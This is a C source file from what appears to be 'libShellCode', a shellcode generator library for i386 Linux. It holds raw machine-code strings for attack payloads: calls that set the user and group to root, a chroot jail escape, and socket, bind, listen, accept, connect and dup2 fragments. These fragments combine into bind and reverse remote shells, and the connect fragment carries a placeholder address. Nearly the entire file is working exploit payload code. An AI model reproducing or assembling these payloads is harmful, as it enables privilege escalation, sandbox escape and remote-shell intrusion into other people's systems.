/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */


#include <stdio.h>
#include <stdlib.h>

char *EXIT_0;
char *SETUID_0;
char *SETREUID_0_0;
char *SETRESUID_0_0_0;
char *SETGID_0;
char *SETREGID_0_0;
char *SETRESGID_0_0_0;
char *CHROOT_EVASION;
char *SOCKET;
char *BIND;
char *LISTEN;
char *ACCEPT;
char *CONNECT;
char *DUP2;


/*
 * Function:    initialize_i386_linux_codes()
 * Parameters:
 * Return:      
 * Description: Initialize the complete syscall funcion codes used to build 
 *              the ShellCodes on i386 linux architecture.
 *
 */

void initialize_i386_linux_codes()
{
  // Completed System Calls

  EXIT_0       = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax   
                                 "\x31\xdb"                 // xor    %ebx, %ebx 
                                 "\x40"                     // inc    %eax
                                 "\xcd\x80");               // int    $0x80 


  SETUID_0     = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax 
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\xb0\x17"                 // movb   $0x17,%al 
                                 "\xcd\x80");               // int    $0x80 


  SETREUID_0_0 = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x31\xc9"                 // xor    %ecx, %ecx
                                 "\xb0\x46"                 // mov    $0x46,%al
                                 "\xcd\x80");               // int    $0x80


  SETRESUID_0_0_0 
               = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x31\xc9"                 // xor    %ecx, %ecx
				 "\x31\xd2"                 // xor    %edx, %edx
                                 "\xb0\xa4"                 // mov    $0xa4,%al
                                 "\xcd\x80");               // int    $0x80


  SETGID_0     = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax 
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\xb0\x2e"                 // movb   $0x2e,%al
                                 "\xcd\x80");               // int    $0x80 


  SETREGID_0_0 = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x31\xc9"                 // xor    %ecx, %ecx
                                 "\xb0\x47"                 // mov    $0x47,%al
                                 "\xcd\x80");               // int    $0x80


  SETRESGID_0_0_0
               = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x31\xc9"                 // xor    %ecx, %ecx
				 "\x31\xd2"                 // xor    %edx, %edx
                                 "\xb0\xaa"                 // mov    $0xaa,%al
                                 "\xcd\x80");               // int    $0x80


  CHROOT_EVASION                                            // Inspired by a posidron code
               = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
			         "\x53"                     // push   %ebx
				 "\x68\x6a\x61\x69\x6c"     // push   $0x6a61696c == jail
			         "\x89\xe3"                 // mov    %esp, %ebx
				 "\xb0\x27"                 // mov    $0x27,%al
                                 "\xcd\x80"                 // int    $0x80
                                 "\x31\xc0"                 // xor    %eax, %eax
                                 "\xb0\x3d"                 // mov    $0x3d,%al
                                 "\xcd\x80"                 // int    $0x80
                                 "\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x31\xc9"                 // xor    %ecx, %ecx
                                 "\xb1\x0a"                 // mov    $0xa, %cl
                                 "\x50"                     // push   %eax
                                 "\x68\x2e\x2e\x2f\x2f"     // push   $0x2f2f2e2e 
                                 "\xe2\xf9"                 // loop   -5
                                 "\x89\xe3"                 // mov    %esp, %ebx
                                 "\xb0\x0c"                 // mov    $0xc, %al
                                 "\xcd\x80"                 // int    $0x80
                                 "\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x6a\x2e"                 // push   $0x2e
                                 "\x89\xe3"                 // mov    %esp, %ebx
                                 "\xb0\x3d"                 // mov    $0x3d,%al
                                 "\xcd\x80");               // int    $0x80


  SOCKET       = (char *) strdup("\x31\xdb"                 // xor    %ebx, %ebx
                                 "\xf7\xe3"                 // mul    %ebx
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\x53"                     // push   %ebx
                                 "\x43"                     // inc    %ebx
                                 "\x53"                     // push   %ebx
                                 "\x43"                     // inc    %ebx
                                 "\x53"                     // push   %ebx
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\x4b"                     // dec    %ebx
                                 "\xcd\x80"                 // int    $0x80
                                 "\x89\xc7");               // mov    %eax, %edi 


  BIND         = (char *) strdup("\x52"                     // push   %edx
                                 "\x66\x51"                 // push   %cx
                                 "\x43"                     // inc    %ebx
                                 "\x66\x53"                 // push   %bx
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\xb0\x10"                 // mov    $0x10,%al
                                 "\x50"                     // push   %eax
                                 "\x51"                     // push   %ecx
                                 "\x57"                     // push   %edi
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\xcd\x80");               // int    $0x80


  LISTEN       = (char *) strdup("\xb0\x66"                 // mov    $0x66,%al
                                 "\xb3\x04"                 // mov    $0x4, %bl
                                 "\xcd\x80");               // int    $0x80


  ACCEPT       = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x57"                     // push   %edi
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\xb3\x05"                 // mov    $0x5, %bl
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\xcd\x80");               // int    $0x80


  CONNECT      = (char *) strdup("\x68\x01\x01\x01\x01"     // push   $0x01010101
                                 "\x66\x51"                 // push   %cx
                                 "\x43"                     // inc    %ebx
                                 "\x66\x53"                 // push   %bx
                                 "\x89\xe1"                 // mov    %esp,%ecx
                                 "\xb0\x10"                 // mov    $0x10,%al
                                 "\x50"                     // push   %eax
                                 "\x51"                     // push   %ecx
                                 "\x57"                     // push   %edi
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\x43"                     // inc    %ebx
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\xcd\x80");               // int    $0x80


  DUP2         = (char *) strdup("\x89\xd9"                 // mov    %ebx, %ecx
                                 "\xb0\x3f"                 // mov    $0x3f,%al
                                 "\x49"                     // dec    %ecx
                                 "\xcd\x80"                 // int    $0x80
                                 "\x41"                     // inc    %ecx
                                 "\xe2\xf8");               // loop   $-8
}


/*
 * Function:    free_i386_linux_codes()
 * Parameters:
 * Return:
 * Description: Free the memory used for the i386 linux codes
 *
 */

void free_i386_linux_codes()
{
  free(EXIT_0); 
  free(SETUID_0);
  free(SETREUID_0_0);
  free(SETRESUID_0_0_0);
  free(SETGID_0);
  free(SETREGID_0_0);
  free(SETRESGID_0_0_0);
  free(CHROOT_EVASION);
  free(SOCKET);
  free(BIND);
  free(LISTEN);
  free(ACCEPT);
  free(CONNECT);
  free(DUP2);
}
